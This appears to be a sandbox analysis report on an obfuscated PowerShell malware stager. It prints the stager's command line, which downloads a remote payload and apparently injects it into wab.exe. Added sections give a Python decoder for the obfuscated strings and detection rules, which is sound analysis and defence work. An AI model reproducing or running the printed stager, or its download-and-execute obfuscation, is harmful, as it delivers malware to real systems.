Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng 
Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf 
');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
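Added worked example, not part of the sandbox report: the helper the stager calls Udvindende keeps one character out of every six of its argument, starting at offset 5 and stopping before the final character ($Twistende.Length - 1), and Unschool dot-sources the result through the decoded string iex. Porting that loop to Python decodes the literals copied from the command line above offline, without running any of it. The decoded values are the page's own strings; the defang and argument-extraction helpers are this example's. Literals whose doubled spaces were collapsed during HTML extraction decode misaligned from the page text (the one assigned to $Veta13 is one of them); the cmd.exe child command line in the process list shows what that one yields on a live host.

```python
import re

# Literals copied verbatim from the powershell.exe command line in the process list above;
# each is an argument to the helper the sample calls Udvindende.
LITERALS = {
    "Pedicures": "TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ",
    "Privileged": "Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ",
    "Sprngningers": "juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ",
    "Forlovede": "Rel,a>R,kla ",
    "Jetmotoren": "Cor,ii KliseCuchix Kyse ",
}


def udvindende(s, start=5, step=6):
    """Port of the sample's decoder.

    PowerShell: For($i=5; $i -lt $s.Length-1; $i+=6){ $out += $s.Substring($i, 1) }
    i.e. take offsets 5, 11, 17, ... while the offset is below Length-1, so the
    last character of the literal (always a filler space here) is never emitted.
    """
    last = len(s) - 1
    return "".join(s[i] for i in range(start, last, step))


def defang(value):
    """Make a decoded URL safe to paste into a ticket (this helper is not from the sample)."""
    if not value.startswith("http"):
        return value
    return value.replace("http", "hxxp", 1).replace(".", "[.]")


def decode_all(literals=LITERALS):
    """Decode every literal; the keys are the variable names the sample assigns them to."""
    return {name: udvindende(value) for name, value in literals.items()}


# Pull every  Udvindende '<literal>'  argument out of a raw command line so the same
# routine works on a fresh sample without hand-copying strings. The literals never
# contain a single quote, so a non-quote run is the whole argument.
ARG_RE = re.compile(r"Udvindende\s+'([^']*)'")


def decode_command_line(cmdline):
    """All decoded Udvindende arguments, in the order they appear in the script."""
    return [udvindende(literal) for literal in ARG_RE.findall(cmdline)]


if __name__ == "__main__":
    for name, plain in decode_all().items():
        print(f"{name:13s} -> {defang(plain)}")
```

The five literals decode to the Firefox 121 User-Agent string, the header name User-Agent, the download URL (one entry; the stager splits it on the decoded separator > and takes element 0, so a list of fallbacks would fit the same slot), and iex. The same loop turns the $Veta13 literal into the cmd.exe command line that appears twice in the process list above, and the stager appends the second output line of that command, the bare letter t, to a decoded prefix ending in System.Net.WebClien before invoking it, so the class name never appears whole in the script or in any single decoded literal.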
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntvdm64.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
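Added detection example, not part of the sandbox report and not a Sysmon or SIEM vendor rule: the process and module-load evidence above carries several signals that survive renaming of every variable in the script. A 64-bit powershell.exe runs with a hidden window and resolves Substring through a variable ($Twistende.$Solbatteri.Invoke), spawns cmd.exe only to echo %appdata% and a one-letter literal, re-launches the same script under the SysWOW64 (32-bit) PowerShell, and that 32-bit instance starts wab.exe from Program Files (x86), which then loads wininet, winhttp and schannel. The records below are constructed to mirror that tree in a Sysmon-like shape (event 1 = process creation, event 7 = image load). Field names, PIDs, the truncated command lines and the list of abused host binaries are this example's assumptions, not the page's.

```python
import re
from collections import defaultdict

# Opening statements of the stager script, copied from the command line in the process list
# above and truncated after the Unschool definition; the rest is the obfuscated payload.
BODY = ("$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';"
        "Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;"
        "For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende."
        "$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}"
        "function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}")

PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD64 = r"C:\Windows\System32\cmd.exe"
CMD32 = r"C:\Windows\SysWOW64\cmd.exe"
WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"
ECHO = r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"'
STAGER64 = 'powershell.exe -windowstyle hidden "' + BODY
STAGER32 = '"' + PS32 + '" "' + BODY

# Constructed telemetry mirroring the sandbox process tree; PIDs are invented.
RECORDS = [
    {"eid": 1, "pid": 5, "image": PS64, "parent": CMD64, "cmdline": STAGER64},
    {"eid": 1, "pid": 6, "image": CMD64, "parent": PS64, "cmdline": ECHO},
    {"eid": 1, "pid": 7, "image": PS32, "parent": PS64, "cmdline": STAGER32},
    {"eid": 1, "pid": 8, "image": CMD32, "parent": PS32, "cmdline": ECHO},
    {"eid": 1, "pid": 9, "image": WAB, "parent": PS32,
     "cmdline": r'"C:\Program Files (x86)\windows mail\wab.exe"'},
    {"eid": 7, "pid": 9, "image": WAB, "loaded": "wininet.dll"},
    {"eid": 7, "pid": 9, "image": WAB, "loaded": "winhttp.dll"},
    {"eid": 7, "pid": 9, "image": WAB, "loaded": "schannel.dll"},
]

# $obj.$var.Invoke(...): a method name resolved from a variable instead of written out.
DYNAMIC_INVOKE = re.compile(r"\.\$\w+\.Invoke\(")
# $x='Sub';$x+='strin';$x+='g';  a short name assembled from tiny literals.
SPLIT_LITERAL = re.compile(r"\$(\w+)='[^']{1,6}';(?:\$\1\+='[^']{1,6}';)+")
HIDDEN_WINDOW = re.compile(r"-w\w*\s+hidden", re.I)
# Assumption for this example: signed 32-bit binaries seen used as injection hosts.
ABUSED_HOSTS = {"wab.exe"}
NET_DLLS = {"wininet.dll", "winhttp.dll", "schannel.dll", "urlmon.dll"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_ps(path):
    return basename(path) == "powershell.exe"


def is_wow64(path):
    return "\\syswow64\\" in path.lower()


def evaluate(records):
    """Return (rule name, pid) for every record that trips a rule, in record order."""
    hits = []
    loads = defaultdict(set)
    for r in records:
        if r["eid"] == 7:
            loads[(r["pid"], basename(r["image"]))].add(r["loaded"].lower())
            continue
        img, parent, cl = r["image"], r["parent"], r["cmdline"]
        if is_ps(img) and HIDDEN_WINDOW.search(cl):
            hits.append(("ps_hidden_window", r["pid"]))
        if is_ps(img) and DYNAMIC_INVOKE.search(cl) and SPLIT_LITERAL.search(cl):
            hits.append(("ps_dynamic_method_invoke", r["pid"]))
        if is_ps(img) and is_ps(parent) and is_wow64(img) and not is_wow64(parent):
            hits.append(("ps64_spawns_ps32", r["pid"]))
        if is_ps(parent) and "echo %appdata%" in cl.lower():
            hits.append(("ps_cmd_echo_appdata", r["pid"]))
        if is_ps(parent) and basename(img) in ABUSED_HOSTS:
            hits.append(("ps_spawns_injection_host", r["pid"]))
    # Image-load rule: a known injection host that pulls in HTTP/TLS stacks.
    for (pid, name), dlls in loads.items():
        if name in ABUSED_HOSTS and dlls & NET_DLLS:
            hits.append(("injection_host_loads_net_dlls", pid))
    return hits


if __name__ == "__main__":
    for rule, pid in evaluate(RECORDS):
        print(f"pid {pid}: {rule}")
```

The 64-bit to 32-bit PowerShell hop and the PowerShell-parented wab.exe are the two rules worth alerting on individually; the others are better used as scoring context, since a hidden window or an echo of %appdata% alone is common in legitimate administration scripts.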
Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.8.dr
Source: Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.8.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb source: msoev.exe.8.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb source: LICLUA.EXE.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.8.dr
